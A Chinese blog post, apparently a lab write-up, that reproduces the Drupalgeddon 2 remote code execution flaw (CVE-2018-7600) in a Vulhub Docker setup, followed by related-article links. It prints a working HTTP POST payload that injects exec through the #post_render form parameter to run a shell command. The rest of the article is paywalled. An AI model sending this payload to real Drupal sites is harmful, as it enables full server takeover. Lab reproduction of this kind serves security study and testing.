Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

最新推荐文章于 2023-08-08 17:21:23 发布
VIP文章 最新推荐文章于 2023-08-08 17:21:23 发布
阅读量6.6k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/limb0/article/details/107122919/
版权

Drupal Drupalgeddon 2 远程代码执行漏洞(CVE-2018-7600)

一、漏洞介绍

2018年3月28日,Drupal官方发布新补丁和安全公告,宣称Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞,执行恶意代码,导致网站被完全控制。

漏洞影响范围:
截止2018年3月29日,还未有公开PoC
Drupal 6.x版本
Drupal 7.x版本
Drupal 8.x版本

二、漏洞危害

远程代码执行。

三、漏洞验证

环境搭建:
实验环境 系统 IP地址
攻击机 win10 192.168.18.7
靶机 win10 192.168.18.7:8088

这里我使用Vulhub搭建环境:
执行如下命令启动drupal 8.5.0的环境: bash docker-compose up -d环境启动后,访问
http://your-ip:8088/(这里我修改了配置文件,默认是8080端口)
将会看到drupal的安装页面,一路默认配置下一步安装。因为没有mysql环境,所以安装的时候可以选择sqlite数据库。
安装成功后如图所示:
在这里插入图片描述

PoC1:

我们向安装完成的drupal发送如下数据包:

该POC仅可执行whoamiid等少量命令。

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: your-ip:8088
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

成功执行代码,这个代码最终执行了id命令:
在这里插入图片描述

最低0.47元/天 解锁文章
limb0
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600
qq_51577576的博客
02-18 458
[ vulhub漏洞复现篇 ] Drupal Drupalgeddon 2 远程代码执行漏洞CVE-2018-7600Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成,在GPL2.0及更新协议下发布。连续多年荣获全球最佳CMS大奖,是基于PHP语言最著名的WEB应用程序。Drupal 6,7,8等多个子版本存在远程代码执行漏洞,攻击者可以利用Drupal网站漏洞执行恶意代码,导致网站被完全控制。
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
CVE-2018-7600 | Drupal 8.5.x < 8.5.1 / 8.4.x < 8.4.6 / 8.x < 8.3.9 / 7.x? < 7.58 / < 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 ~ user/register URL,攻击account/mail & #post_render参数,使用 PHP 的passthru函数 Drupal < 7.58 ~ user/password URL,攻击triggering_element_name表单 & #post_render参数,使用 PHP 的passthru函数 使用直接命令(又名无文件方法)或将PHP shell写入 Web 根目录 ( ./ ) 或子目录 ( .
DC-1靶机渗透笔记
qq_60600840的博客
08-08 153
DC-1靶机、安全、渗透、靶机
GhostScript 沙箱绕过(命令执行漏洞CVE-2018-16509)
黑白的博客
12-22 1212
声明 好好学习,天天向上 漏洞描述 8 月 21 号,Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等漏洞 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 影响范围 Ghostscript 9.24之前版本 复现过程 这里使用7.0.8版本 使
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 1244
drupal命令执行
Drupal Drupalgeddon 2远程执行代码漏洞RCE(CVE-2018-7600漏洞复现
ADummy的博客
02-23 840
Drupal Drupalgeddon 2远程执行代码漏洞CVE-2018-7600) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显—>getshell 0x01漏洞介绍 ​ 7.58之前的Drupal,8.3.9之前的8.x,8.4.6之前的8.4.x和8.5.1之前的8.5.x允许远程攻击者执行任意代码,因为该问题会影响具有默认或通用模块配置的多个子系统,包括表单API。。 影响版本 Drupal < 7.58 Drupal < 8.3
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 3758
CVE-2018-7600漏洞学习与复现
Drupal Drupalgeddon 2远程执行代码漏洞CVE-2018-7600
07-19 558
漏洞复现:1.参考a2u / CVE-2018-7600,我们可以向drupal发送以下请求:POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: your-ip:8080Accept-Encoding: gzip...
drupal 7 ajax,【漏洞分析】CVE-2018-7600 Drupal 7.x 版本代码执行
weixin_35700003的博客
08-06 1221
阅读:8,003CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出来之后大家都赶紧分析了一波,然后热度似乎慢慢退去了。两天前Drupalgeddon2项目更新了7.x版本的exp,实际环境也出现了利用,下面就简单来看一下0x01 概述CVE-2018-7600影响范围包括了Drupal 6.x,7.x,8.x版本,前几天8.x版本的PoC出...
CVE-2018-7600Drupal 8 远程代码执行漏洞
Mr_atopos的博客
06-07 2629
使用vulhub搭建环境使用vulhub搭建环境出现了一些问题,这里直接使用BUU的环境 BUU CEV-2018-7600进去也要初始化环境,一开始语言选择英文,数据库选择SQLite 其他的可以随便设置 进入 这个漏洞可能出现在填写表单的地方,该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置可以利用注册用户来进行漏洞利用先随便输入测试 通过查阅 Drupal代码和文档,可以知道,对于
drupalgeddon2:没有metasploit的drupalgeddon2
04-06
drupalgeddon2 没有metasploit的drupalgeddon2。 python3脚本 用法:python3 drupalgeddon2.py <target>
Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)
07-10
使用docker-compose命令一步搭建Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340) 的漏洞环境
RTSP默认口令/弱口令漏洞
热门推荐
limb0的博客
11-04 1万+
RTSP 默认口令/弱口令漏洞 一、漏洞介绍 RTSP(Real Time Streaming Protocol),实时流传输协议,是TCP/IP协议体系中的一个应用层协议,该协议定义了一对多应用程序如何有效地通过IP网络传送多媒体数据,被广泛用于视频直播领域,为方便用户远程监控摄像头内容,许多摄像头厂商会在摄像头或NVR中开启RTSP服务器。 二、漏洞危害 攻击者可通过VLC等视频播放软件打开r...
Drupal 远程代码执行漏洞CVE-2019-6339)
limb0的博客
07-04 8911
Drupal 远程代码执行漏洞CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
NFS未授权访问
limb0的博客
11-20 7940
NFS未授权访问 一、漏洞介绍 NFS(Network File System)即网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。若运维人员未对文件访问进行控制,将导致本地文件可被任意读取。 二、漏洞危害 本地文件可被任意读取。 三、漏洞验证 首先执行showmount试试...
"drupal < 7.32 \"drupalgeddon\" sql injection vulnerability (cve-2014-3704)漏洞"
最新发布
10-28
Drupal <7.32版本中存在一个名为“Drupalgeddon”的SQL注入漏洞漏洞编号为CVE-2014-3704。 SQL注入是一种常见的网络安全漏洞,它允许攻击者通过在输入中注入恶意的SQL代码来干扰或绕过应用程序的数据库查询。在Drupal版本7.32以前,因为对用户输入的处理不完善,攻击者可以通过特殊构造的输入来执行恶意的SQL操作。 在Drupalgeddon漏洞中,攻击者可以利用这个漏洞执行各种恶意的操作,包括获取敏感数据、篡改或删除数据库中的数据,甚至完全控制受影响的Drupal网站。 为了修复这个漏洞Drupal开发团队推出了补丁程序,所有受影响的用户都被建议尽快升级到Drupal的7.32版本或更高的版本。升级到最新版本可以修复这个漏洞,并增强系统的安全性。 此外,通过使用Web应用程序防火墙(WAF)或其他安全性插件,可以进一步增强对SQL注入漏洞的保护。这些插件可以根据已知的攻击模式和行为规则来检测和阻止SQL注入攻击尝试。 总而言之,对于Drupal <7.32版本的用户,及时升级到最新版本,并采取额外的安全措施,是防止“Drupalgeddon” SQL注入漏洞被利用的关键步骤。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值